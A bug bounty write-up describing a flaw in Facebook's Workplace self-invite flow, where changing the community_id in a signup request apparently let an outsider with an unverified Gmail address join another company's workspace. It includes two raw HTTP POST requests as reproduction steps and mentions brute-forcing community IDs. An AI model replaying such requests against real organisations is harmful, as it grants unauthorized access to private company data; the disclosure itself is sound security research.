Workplace from Facebook | Unauthorized access to companies environment

Hello Everyone,

In this article, I will be describing a serious vulnerability I found in Workplace, an enterprise social network from Facebook.

Description:

Info: https://www.workplace.com/help/work/336227380906523

Although, the server wasn’t correctly verifying the email used on registration, allowing the creation of accounts through an email that wasn’t verified by the administrator.

This could have allowed a malicious user to access a company’s Workplace environment. But, this was only possible if the company enabled the self-invite feature.

Details:

==

  • After registering a new account in my Workplace and revising Burp Suite history tab, I came across the following request:

After some tests with this endpoint, I concluded that was possible to create accounts in other Workplaces just by modifying “community_id”

Using a personal email account (@gmail.com), it was already possible to execute the vulnerability.

Reproduction Steps:

POST /at_work/accounts_send_notification HTTP/1.1
Host: graph.workplace.com
identifier=test@gmail.com
pre_login_flow_type=SIGNUP
access_token=*****

Activation code successfully received.

2. Create a Facebook Workplace account:

POST /at_work/accounts_self_invite HTTP/1.1
Host: graph.workplace.com
identifier=test@gmail.com
nonce=998236
community_id=86381-----------
form_data={"name":"Test","password":"Test1234@"}
access_token=*****
  • nonce : activation code from first step.
  • community_id : Target company’s community ID.

==

Boom! The account has been successfully created, and now the attacker has free access to the files, photos, groups, emails and other data from the target company.

Without counting employees exposure…

==

However…

  • The attacker had to have the ID from the target company’s community. This was possible to get through brute force, or with some ex-employee from the company.
  • Some days after I received the bounty, I was able to find an endpoint which gives the community_id from any company in Workplace.

Timeline:

Thank you for taking the time to read my article

My Twitter profile: https://twitter.com/mvinni_

Brazilian 19 years old